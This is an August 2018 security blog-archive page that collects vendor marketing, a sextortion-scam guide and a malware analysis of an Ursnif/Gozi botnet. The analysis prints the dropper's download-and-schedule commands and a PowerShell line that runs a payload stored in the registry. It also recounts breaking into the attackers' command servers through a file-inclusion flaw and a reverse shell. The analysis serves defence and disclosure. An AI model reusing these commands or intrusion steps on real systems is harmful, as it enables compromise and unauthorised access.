Monthly Archives: August 2018

Seamless Security for the Connected Consumer

Laptops, mobile phones, tablets, smartwatches, and more are all often found in a modern user’s arsenal of personal devices. We rely on these devices for so many things – to wake us up, count calories, connect us to friends and loved ones, provide access to the web, the list goes on. We love our devices, that much is clear. But this love has almost become bittersweet due to growing concerns about how using these devices impact our privacy.

Not so long ago, cybersecurity was a distant idea for many of us. But big-name data breaches and attacks changed all of that. Dyn, WannaCry, and Equifax soon became household names, causing us to consider how we use connected devices, what exactly we connect to, and who we share their information with. As Kelly Sheridan, a reporter at Dark Reading, states “A few years ago, many people didn’t talk about cybersecurity or even pay much attention to it. These days, it’s a growing source of stress among consumers, who rely on several devices and businesses to protect their data.” Now, with cybersecurity making all of us anxious, the next question is, how can we enjoy the convenience of our personal devices while still remaining secure?

Staying connected doesn’t have to be a bittersweet experience. In fact, we can do a lot to empower ourselves and become security savvy. To remain protected anywhere we are connected, we can look to McAfee for a seamless, simple yet powerful security experience.

McAfee aims to make it easy for everyone to protect what matters most. We understand the complexity of managing multiple devices in our already busy lives. We understand that the last thing users need is a complex product for securing devices. Our focus at McAfee is to simplify digital protection by providing a seamless unified experience. So, whether you are at home, or out and about, McAfee’s protects your identity, your data, and your devices all with the same delightful, unified user experience powered by McAfee’s cloud. Our goal is to create an effortless onboarding experience and make it quick and easy to set up digital security for you and your entire family. Plus, you can manage it all from a simple mobile app so you can get notified when a new threat is discovered and receive tips for staying protected.

Now, you can rest assured that your identity and your digital privacy are protected with security that is effective, simple and meaningful. You will be able to use their devices anywhere and stay protected against any threat, on any network. With this approach, living a connected lifestyle no longer has to be bittersweet.

To learn more about consumer security and our approach to it, be sure to follow us at @McAfee and @McAfee_Home.

The post Seamless Security for the Connected Consumer appeared first on McAfee Blogs.

The Economic Growth, Regulatory Relief and Consumer Protection Act: What Parents Should Know

When we think about credit cards, we usually think of our own – what we use them for, how our credit is doing, and most importantly, that they remain in our hands and not in that of a cybercriminal. But something many parents forget – the cyberthreats that could potentially impact our financial information could very well impact our children’s, given they have credit cards of their own. As a matter of fact, there’s a new law that helps parents with exactly that – protecting their kids’ credit, amongst a few other things. It’s called the Economic Growth, Regulatory Relief and Consumer Protection Act, and it takes effect on September 21st of this year.

So, what does this law mean for parents and their kids? With this law, free credit freezes will be available for anyone – including children under the age of 16 – in the country (currently, there may be fees depending on state laws). That way, if a cybercriminal tries to open up an account with a minor’s information, the impacted family can freeze that account immediately. Additionally, it will extend fraud alerts from 90 days to a full year.

As a result of this law, Equifax, Experian, and TransUnion will each set up a web page for requesting fraud alerts and credit freezes. The FTC will also post links to those web pages on

So, with this law coming into effect in no time, what next steps should parents take to reap its benefits? Start by following these tips:

  • Find out if your child has a credit report. First and foremost, head here and go to the ‘Child Identity Theft’ section. It will have instructions on how to find out if your child has a credit report. Most young children shouldn’t have credit files, but if they do, the page includes contact information for credit agencies and advice on how to freeze credit.
  • Keep the record of freezes in a safe place. If you do have to freeze a credit report, keep the records stored in a safe place. Make sure your family can find it when needed, and a crook can’t access it.
  • Invest in an identity theft monitoring and recovery solution. The best way to protect you or a family member from identity theft is by being proactive. That’s precisely why you should leverage a solution tool such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Economic Growth, Regulatory Relief and Consumer Protection Act: What Parents Should Know appeared first on McAfee Blogs.

Value-Driven Cybersecurity

Constructing an Alliance for Value-driven Cybersecurity (CANVAS) launched ~two years ago with F-Secure as a member. The goal of the EU project is “to unify technology developers with legal and ethical scholars and social scientists to approach the challenge of how cybersecurity can be aligned with European values and fundamental rights.” (That’s a mouthful, right?) Basically, Europe wants to align cybersecurity and human rights.

If you don’t see the direct connection between human rights and cybersecurity, consider this: the EU’s General Data Protection Regulation (GDPR) is human rights law. Everybody’s data is covered by GDPR. Meanwhile, in the USA… California’s legislature is working on a data privacy bill, and there’s now a growing amount of lobbyists fighting over how to define just what a “consumer” is. So, in the USA, data protection is not human rights law, it’s consumer protection law (and there are likely to be plenty of legal loopholes). And in the end, not everybody’s data will be covered.

So there you go, the EU sees cybersecurity as something that affects everybody, and the CANVAS project is part of its efforts to ensure that the rights of all are respected.

As part of the project, on May 28th & 29th of this year, a workshop was organized by F-Secure at our HQ on ethics-related challenges that cybersecurity companies and cooperating organizations face in their research and operations. Which is to say, what are the considerations that cybersecurity companies and related organizations must take into account to be upstanding citizens?

The theme made for excellent workshop material. Also, the weather was uncharacteristically cooperative (we picked May to increase the odds in our favor), the presentations were great, and the resulting discussions were lively.

Topics included:

  • Investigation of nation-state cyber operations.
  • Vulnerability disclosure and the creation of proof-of-concept code for: public awareness; incentivizing vulnerability fixing efforts; security research; penetration testing; and other purposes.
  • Control of personal devices. Backdoors and use of government sponsored “malware” as possible countermeasures to the ubiquitous use of encryption.
  • Ethics, artificial intelligence, and cybersecurity.
  • Assisting law enforcement agencies without violating privacy, a CERT viewpoint.
  • Targeted attacks and ethical choices arising due to attacker and defender operations.
  • Privacy and its assurance through data economy and encryption, balancing values with financial interests of companies.

The workshop participants included a mix of cybersecurity practitioners and representatives from policy focused organizations. The Chatham House rule (in particular, no recording policy) was used to allow for free and open discussion.

So, in that spirit, names and talks won’t be included in text of this post. But, for those who are interested in reading more, approved bios and presentation summaries can be found in the workshop report (final draft).

Next up on the CANVAS agenda for F-Secure?

CISO Erka Koivunen will be in Switzerland next week (September 5th & 6th) at The Bern University of Applied Sciences attending a workshop on: Cybersecurity Challenges in the Government Sphere – Ethical, Legal and Technical Aspects.

Erka has worked in government in the past, so his perspective covers both sides of the fence. His presentation is titled: Serve the customer by selling… tainted goods?! Why F-Secure too will start publishing Transparency Reports.

How to Avoid Falling Prey to Sextortion

When it comes to the world of online scams, sextortion is one of the most common ones and a threat that’s not going away anytime soon. Because this threat is so pervasive and can take so many forms, we thought it would be best to do a write-up and offer you ways to protect yourself online and avoid sextortion scams.

What is sextortion?

It’s a form of blackmail in which a cybercriminal or a former friend or romantic partner tries to extract favors or financial gain from a victim.

Ever since the web became a daily destination for a majority of people, there have been cases of sextortion through the use of webcams, the threat of intimate pictures leaking and hundreds and thousands of victims. We believe that, with proper education, such damaging attacks could be averted or, at the very least mitigated.

Even though most people exercise caution in sending potentially compromising pictures and videos, sometimes even the best of us could be exposed to sextortion. A survey of 1,631 victims of sextortion revealed how every online user is, at one point or the other, potentially liable to become a sextortion victim.

Here’s why:

  • They were in a wanted romantic or sexual relationship—72% of those who knowingly provided images
  • Perpetrators pressured them to provide images or made them feel bad—51%
  • Perpetrators tricked them into providing images—15%
  • Perpetrators threatened or forced them to provide images—13%
  • They expected to be paid for the images—2%
  • They thought the pictures would be used for purposes such as modeling or acting—2%

But what if no one actually has compromising pictures of you?

Sextortion that demands a Bitcoin payment

Enter 2018’s most popular sextortion scam. It circulates via email and the cybercriminal will send you one of your own passwords to prove they have compromising images of you. Of course, they don’t, but some people have been fooled. Cybercriminals obtain stolen passwords and then simply fire off a flurry of emails to their owners, making threats and demanding hefty payments.

Here is one such email received by the mom of one Heimdal Security team member. After laughing for a bit at the sheer audacity of it, we had to investigate a bit further and see if anyone fell victim to it.


What’s worse is the fact that, in this case, 24 hours before the email above was sent, someone already fell victim to this scam. A simple search of the bitcoin address provided by the cybercriminal shows that someone sent 0.26 BTC there.


On July 17, one Bitcoin traded for around $7,500, which means a sextortion victim paid almost $2,000 after receiving a bogus email. If this scam were to circulate back in December 2017, that same victim would have paid around $5000.

This type of sextortion scam demanding payment in bitcoin is so widespread, it’s unbelievable. Just hours after Reddit officially announced they had a breach, due to the fact that employees relied on SMS-based two-factor authentication, plenty of users found threatening emails in their inbox. Why? The Reddit data breach exposed quite a few old usernames and passwords. Cybercriminals took those passwords to provide some “legitimacy” to their common online scam. Even one of Reddit’s employees received the sextortion message, pointing out the ways cybercriminals try to monetize stolen email databases.

Other types of scams and how to steer clear of online scams

As long as people will continue to have digital lives, sextortion will, in one way or another, remain one of the most common types of online scams. Whether it will come from a known person, after a phishing attack or as part of a spray-and-pray email scam campaign, there’s no question about it, it will happen time and time again.

As a regular user, you can’t prevent or anticipate all the tactics a cybercriminal might adopt. What you can do is remain vigilant and spend a bit of time educating yourself on the various types of online scams.

We gathered here quite a few resources:

How to proactively stop scams from even reaching you

As we said in our analysis over what happened at Facebook and how your privacy was breached, the best way to stop online scams (sextortion included) is to make sure your own defenses are up.

Here are the five essential steps to protect your privacy:

  1. Always consider the type of information or pictures you post or share online. Ask yourself: “What would I do if someone threatened to show this to everyone I know?” (more on this here and here, in our guide to protecting yourself against doxxing)
  2. Keep your devices and PC updated and protected not just with antivirus, but with a tool that can block infected links (more on this here)
  3. Use strong passwords and, to avoid reusing them, consider trying a password manager that can generate unique ones for every account
  4. Go on every social media account you have and review the privacy settings. Also, take the time to consider what friends and followers you have.
  5. Learn how to spot phishing attempts that could lead to a criminal obtaining your passwords and other sensitive information.

Here are a few quick tips to avoid phishing, one of the most common ways in which scammers can get to you:

  • Be careful what you click on in emails, especially when it comes to attachments.
  • Consider having an email just for subscriptions and another one for actually important stuff. Both of them should be secured strong (and different!) passwords.
  • Always hover your mouse over links and check where they go (a misspelled letter almost always means a compromised link)
  • Always check the sender and, if you don’t know the person, it’s probably best to not click on any attachments.
  • Secure your valuable accounts with two-factor authentication that relies on unique codes, not texts messages (it avoids the risk of SMS-hijacking). That way, even if someone gets your password, they’ll still be unable to login into your account.
  • Periodically check if your email addresses were compromised in a data breach (unfortunately, they happen quite often) using a tool like this.

If you want to know more, we have a mega-guide with phishing prevention tips here.

We want to know if you’ve been exposed to scams like these or ever received threatening messages of this type. It would be great if you’d comment below (and even include a screenshot!) to help others better spot scams.

Do you have another tip for staying safe? Let us know.

Spend time with your family, not updating their apps!
Let THOR FREE Silently and automatically update software Close security gaps Works great with your favorite antivirus


Download Thor FREE

The post How to Avoid Falling Prey to Sextortion appeared first on Heimdal Security Blog.

Hacking The Hacker. Stopping a big botnet targeting USA, Canada and Italy

Today I'd like to share a full path analysis including a KickBack attack which took me to gain full access to an entire Ursniff/Gozi BotNet .

  In other words:  from a simple "Malware Sample" to "Pwn the Attacker Infrastructure".

NB: Federal Police has already been alerted on such a topic as well as National and International CERTs/CSIRT (on August 26/27 2018) . Attacked companies and compromised hosts should be already reached out. If you have no idea about this topic until now it means, with high probability, you/your company is not involved on that threat. I am not going to public disclose the victims IPs. 

This disclosure follows the ethical disclosure procedure, which it is close to responsible disclosure procedure but mainly focused on incident rather than on vulnerabilities.

Since blogging is not my business, I do write on my personal blog to share knowledge on Cyber Security, I will describe some of the main steps that took me to own the attacker infrastructure. I will no disclose the found Malware code nor the Malware Command and Control code nor details on attacker's group, since I wont put on future attackers new Malware source code ready to be used.

My entire "Cyber adventure" began from a simple email within a .ZIP file named "Nuovo" as an apparently normal attachment (sha256: 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041) . Inside the ZIP a .VBS file (sha265: 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d) which for the time being August 21 2018 was totally unknown from VirusTotal (unknown = not yet analysed) was ready to get started through double click. The VisualBasic Script (Stage1) was heavily obfuscated in order to avoid simple reverse engineering analyses on it, but I do like  de-obfuscate hidden code (every time it's like a personal challenge). After some hardworking-minutes ( :D ) Stage1 was totally de-obfuscated and ready to be interpreted in plain text. It appeared clear to me that Stage1 was in charged of evading three main AVs such as: Kaspersky Lab, Panda Security and Trend Micro by running simple scans on Microsoft Regedit and dropping and executing additional software.

Stage1. Obfuscation
Indeed if none of searched AV were found on the target system Stage1 was acting as a simple downloader. The specific performed actions follows:
"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe &schtasks /create /st 01:36 /sc once /tn srx3 /tr C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe
Stage1 was dropping and executing a brand new PE file named: rEOuvWkRP.exe (sha256: 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c) using the bitsadmin.exe native Microsoft program. BitsAdmin.exe is a command-line tool that system admin can use to create download or upload jobs and monitor their progress over time. This technique have been widely used by Anunak APT during bank frauds on the past few years.

The Stage2 analysis (huge step ahead here)  brought me to an additional brand new Drop and Decrypt stager. Stage3 introduced additional layers of anti-reverse engineering. The following image shows the additional PE section within high entropy on it. It's a significative indication of a Decrypter activity.

Stage2. Drop and Decrypt the Stage3. You might appreciate the high Entropy on added section

Indeed Stage 3 (sha256: 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e) was packed as well. A UPX algorithm was used to hide the real payload in such a way many AV engines were not able to detect it since signature was changing from original payload. Finally the de-packed payload presented many interesting features; for example it was weaponised with evasion techniques such as: timing delay (through sleep), loop delay by calling 9979141 times GetSystemTimeAsFileTime API, BIOS versioning harvesting, system manufacturer information and system fingerprinting to check if it was running on virtual or physical environment. It installed itself on windows auto-run registry to get persistence on the victim machine. The following action was performed while running in background flag:
cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\4CA108BF-3B6C-5EF4-2540-9F72297443C6').Audibrkr))

The final payload executed the following commands and spawned two main services (WSearch, WerSvc) on the target.
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:406536 /prefetch:2
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:0000000000000000
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:65800 WinX:0 WinY:0 IEFrame:0000000000000000
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:144390 /prefetch:2
C:\Windows\system32\SearchIndexer.exe /Embedding
taskhost.exe SYSTEM
taskhost.exe $(Arg0)
C:\Windows\System32\svchost.exe -k WerSvcGroup
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\system32\SearchFilterHost.exe" 0 552 556 564 65536 560
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:592 CREDAT:209921 /prefetch:2
cmd /C "nslookup > C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
cmd /C "echo -------- >> C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"
C:\Windows\system32\WerFault.exe -u -p 2524 -s 288
"C:\Windows\system32\wermgr.exe" "-queuereporting_svc" "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_82b9a110b3b94c55171865162b471ffb8fadc7c6_cab_0ab86b12"

Stage3 finally connects back to C2s once checked its own ip address. Two main C2s were observed:

    • C2 level_1 (for domains and ips check the IoC section). The Stage3 connects back to C2 level_1 to get weaponised. Level_1 Command and Controls get information on victims and deliver plugins to expand the infection functionalities.
    • C2 level_2 (for domains and ips check the IoC section). Stage 3 indirectly connects to C2 level_2 in order to give stolen information. It 's a Ursniff/Gozi and it exfiltrates user credentials by looking for specific files, getting user clipboard and  by performing main in the browser attack against main web sites such as: paypal gmail, microsoft and many online services.

So far so good. Everything looks like one of my usual analyses, but something got my attention. The C2 level_1 had an administration panel which, on my personal point of view, was "hand made" and pretty "young" as implementation by meaning of HTML with not client side controls, no clickjacking controls and not special login tokens. According to Yoroi's mission (to defend its customers) I decided to go further and try to defend people and/or infected companies by getting inside the entire network and  to collaborate to local authorities to shut them down, by getting as much information as possible in order to help federal and local police to fight the Cyber Crime.

Fortunately I spotted a file inclusion vulnerability in Command and Control which took me in ! The following image shows a reverse shell I spawned on Attacker's command and control.

Reverse Shell On C2 Stage_1

Now, I was able to download the entire Command and Control Source Code (php) and study it ! The study of this brand new C2  took me to the next level. First of all I was able to get access to the local database where I found a lot of infected IPs (the IPs which were communicating back to C2 level_1). The following image proves that the downloaded Command and Control system has Macedonian dialect (Cyrillic language) on it, according to Anunak APT report made by group-ib.

Command and Control Source Code (snip)
The following image represents a simple screenshot of the database dump within Victim IPs (which are undisclosed for privacy reasons).

C2 level_1 Database 

Additional investigations on database brought new connected IPs. Those IPs were querying the MySQL with administrative rights. At least additional two layers of C2 were present. While the level_1 was weaponising the malware implant the level_2 was collecting information from victims. Thanks to the source code study has been possibile to found more 0Days to be used against C2 and in order to break into the C2 level_2 . Now I was able to see encrypted URLs coming from infected hosts.  Important steps ahead are intentionally missing. Among many URLs the analyst was able to figure out a "test" connection from the Attacker and focus to decrypt such a connection. Fortunately everything needed was written on command and control source code. In the specific case the following function was fundamental to get to clear text !

URL Decryption Function
The eKey was straight on the DB and the decryption function was quite easy to reverse. Finally it was possible to figured out how to decrypt the attacker testing string (the first transaction available on logs) and voilà, it was possible to checkin in attacker's email :D !

Attacker eMail: VPS credentials
Once "in" a new need came: discovering the entire network by getting access to the VPS control panel. After some active steps directly on the attacker infrastructure it was possible to get access to the entire VPS control panel. At this point it was clear the general infrastructure picture* and how to block the threat, not only for customers but for everybody !

Attacker VPS Environment

Sharing these results for free would make vendors (for example: AV companies, Firewall companies, IDS companies and son on) able to update their signatures and to block such a threat for everybody all around the world. I am sure that this work would not block malicious actors, BUT at least we might rise our voice against cyber criminals ! 

In this post I described the main steps that took me to gain access to a big Ursniff/Gozi Botnet in order to shut it down by alerting federal and national authorities (no direct destructive actions have been performed on attacker infrastructure). The threat appeared very well structured, Docker containers were adopted in order to automatise the malicious infrastructure deployment and the code was quite well engineered. Many layers of command and control were found and the entire infrastructure was probably set up from a criminal organisation and not from a single person.

The following graph shows the victim distribution on August 2018. The main targets currently are USA with a 47% of the victims, followed by Canada (29.3%) and Italy (7.3%). Total victims on August 2018 are several thousands.

Victims Distribution on August 24 2018

During the analyses was interesting to observe attacker was acquiring domains from an apparent "black market"where many actors where selling and buying "apparent compromised domains" (no evidence on this last sentence, only feeling). The system (following picture) looks like a trading platform within public API that third party systems can operate such as stock operators.

Apparent Domain BlackMarket

Hope you enjoyed the reading.

Following a list of interesting artefacts that would be helpful to block and prevent the described threat.

  • 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d (.vbs)
  • 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041 (Nuovo
  • 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c (rEOuvWkRP.exe)
  • 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e (Stage 3.exe)
Windows Services Names:
  • WSearch
  • WerSvc
Involved eMails:
Involved IPs:
  • 198[.]54[.]116[.]126 (Dropper Stage 2)
  • 195[.]123[.]237[.]123 (C2 level_1)
  • 185[.]212[.]47[.]9 (C2 level_1)
  • 52[.]151[.]62[.]5 (C2 level_1)
  • 185[.]154[.]53[.]185 (C2 level_1)
  • 185[.]212[.]44[.]209 (C2 level_1)
  • 195[.]123[.]237[.]123 (C2 level_1)
  • 185[.]158[.]251[.]173 (General Netwok DB)
  • 185[.]183[.]162[.]92 (Orchestrator CPANEL)

Involved Domains:
  • http://englandlistings[.]com/pagverd75.php (Dropper Stage 2)
  • https://pool[.]jfklandscape[.]com  (C2 level_1)
  • https://pool[.]thefutureiskids[.]com (C2 level_1)
  • https://next[.]gardenforyou[.]org (C2 level_1)
  • https://1000numbers[.]com (C2 level_1)
  • https://batterygator[.]com (C2 level_1)
  • https://beard-style[.]com (C2 level_1)
  • https://pomidom[.]com (C2 level_1)
  • (C2 level_1)
  • (C2 level_1)
  • (C2 level_1)
  • (C2 level_1)
  • (Orchestrator CPANEL)

*Actually it was not the whole network, a couple of external systems were investigated as well.

Risky Business feature interview: Linux malware is booming, thanks to IoT

The widespread adoption of smart and IoT devices – everything from drones and security cameras to thermostats and routers, mean the developers of non-Windows-based malware have been pretty busy lately

In fact, there’s been an almost tenfold increase in the volume of these (ELF) samples submitted to Virus Total over the past two years. That’s according to a cohort of researchers from the Software and System Security group at French graduate school EURECOM, who set out in 2016 to develop an empirical study of non-Windows malware.

They downloaded hundreds of daily candidate samples from Virus Total for a year, resulting in a dataset of more than 10,000 binaries and a tool called Padawan, an automated framework for dynamic analysis of non-Windows malware.

The researchers presented findings earlier this year at the IEEE Symposium on Security and Privacy, and more recently at reverse engineering conference RECon in Montreal. Risky Business contributor Hilary Louise recently caught up over the phone with France-based EURECOM doctoral student Emanuele Cozzi who says the land of Linux-type malware analysis is a bit of a nascent field.

Drupal Cache Poisoning SA-CORE-2018-005

(Analysis by Lena Frid, Bar Menachem and Victor Hora) Shortly after the recent Drupalgeddon vulnerabilities hit the popular content management system, new vulnerabilities were discovered. As reported by PortSwigger Web Security, Drupal versions 8.x are vulnerable to cache poisoning, by...

Making an Impact with Security Awareness Training: Structuring the Program

Posted under: Research and Analysis

We have long been fans of security awareness training. As explained in our 2013 paper Security Awareness Training Evolution, employees remain the last line of defense, and in all too many cases those defenses fail. We pointed out many challenges facing security awareness programs, and have since seen modest improvement in some of those areas. But few organizations rave about their security awareness training, which means we still have work to do.

In our new series, Making an Impact with Security Awareness Training, we will put the changes of the last few years into proper context, and lay out our thoughts on how security awareness training needs to evolve to provide sustainable risk reduction.

First we need to thank our friends at Mimecast, who have agreed to potentially license the content at the end of the project. After 10 years, Securosis remains focused on producing objective research through transparent methodology. So we need security companies which understand the importance of our iterative process of posting content to the blog and letting you, our readers, poke holes in it. Sometimes our research takes unanticipated turns, and we appreciate our licensee’s willingness to allow us to write impactful research – not just stuff which covers their products.

Revisiting Security Awareness Training Evolution

Before we get going on making an impact, we need to revisit where we’re coming from. Back in 2013 we identified the challenges of security awareness training as:

  • Engaging students: Researchers have spent a lot of time discovering the most effective ways to structure content to teach information with the best retention. But most security awareness training materials seem to be stuck in the education dark ages, and don’t take advantage of these insights. So the first and most important issue is that training materials aren’t very good. For all training, content is king.
  • Unclear objectives: When training materials attempt to cover every possible attack vector they get diluted, and students retain very little of the material. Don’t try to boil the security ocean with an overly broad curriculum. Focus on specific real threats which are likely in your environment.
  • Incentives: Employees typically don’t have any reason to retain information past the completion of training, or to use it on a daily basis. If they click the wrong thing IT will come to clean up the mess, right? Without either positive or negative incentives, employees forget courses as soon as they finish.
  • Organizational headwinds: Political or organizational headwinds can sabotage your training efforts. There are countless reasons other groups within your organization might resist awareness training, but many of them come back to a lack of incentive – mostly because they don’t understand how important it is. And failure to make your case is your problem.

The industry has made minor progress in these areas, mostly in the area of engaging content. The short and entertaining content emerging from many awareness training companies does a better job of engaging employees. Compelling characters and a liberal sprinkling of humor help make their videos more impactful and less reminiscent of root canal.

But we can’t say a lot of the softer aspects, such as incentives and the politics of who controls training, have improved much. We believe improving attitudes toward security awareness training requires first defining success and getting buy-in for the program early and often. Most organizations haven’t done a great job selling their programs – instead defaulting to the typical reasons for security awareness training, such as a compliance mandate or a nebulous desire to having fewer employees click malicious links. Being clear about what success means as you design the program (or update an existing program) will pay significant dividends down the road.

Success by Design

If you want your organization to take security awareness training seriously, you need to plan for that. If you don’t know what success looks like you are unlikely to get there. To define success you need a firm understanding of why the organization needs it. Not just because it’s the right thing to do, or because your buddy found a cool vendor with hilarious content. We are talking about communicating business justification for security awareness training, and more importantly what results you expect from your organization’s investment of time and resources.

As mentioned above, many training programs are created to address a compliance requirement or a desire to control risk more effectively. Those reasons make sense, even to business people. But quantifying the desired outcomes presents challenges. We advise organizations to gather a baseline of issues to be addressed by training. How many employees click on phishing messages each week when you start? How many DLP alerts do you get indicating potential data leakage? These numbers enable you to define targets and work towards them.

We recommend caution – you need to manage expectations, avoiding assumptions of perfection. That means understanding which risks training can alleviate and which it cannot. If the attack involves clicking a link, training can help. If it’s preventing a drive-by download delivered by a compromised ad network, there’s not much employees can do.

Once you have managed expectations it’s time to figure out how to measure employee engagement. You might send out a survey to gain feedback on the content. Maybe you will set up a game where different business units can compete. Games and competition can provide effective incentives for participation. You don’t need to offer expensive prizes. Some groups put in herculean effort to win a trophy and bragging rights.

To be clear, employees might need to participate in the training to keep their jobs. Continued employment offers a powerful incentive to participate, but not necessarily to retain the material or have it impact day-to-day actions. So we need a better way to connect training to corporate results.

The True Measure: Risk Reduction

The most valuable outcome is to reduce risk, which gives security awareness training its impact on corporate results. It’s reasonable to expect awareness training to result in fewer successful attacks and less loss: risk reduction. Every other security control and investment needs to reduce risk, so why hasn’t security awareness training been held to the same standard? We don’t know either, but the time has come to start thinking about it.

What does risk reduction mean in the context of security awareness training? It’s giving employees the necessary training, while understanding they won’t retain everything. Not the first time anyway. Learning requires repetition, but why repeat training for someone who already gets it? That’s a waste of time. So to follow up and focus on retention, you want to deliver appropriate content to employee when they need it. That means refreshing employees about phishing – not after an arbitrary or random time, but after they clicked a phishing message.

Contextual training requires integration with applicable security controls. For example you need a trigger from the email security gateway when an employee clicks a dangerous link in an email. You can also get triggers when an employee navigates to a malicious site via DNS and web security gateways which track where they browse. Finally, integration with DLP offers opportunities to revisit training on protected content after making a mistake.

We’ll dig deeper into Continuous Contextual Content in our next post.

Content Remains Key

We can slice and dice it many different ways, but we can’t get around it. Without the right content any security awareness training program will fail. Here are five keys for engaging and effective awareness training content.

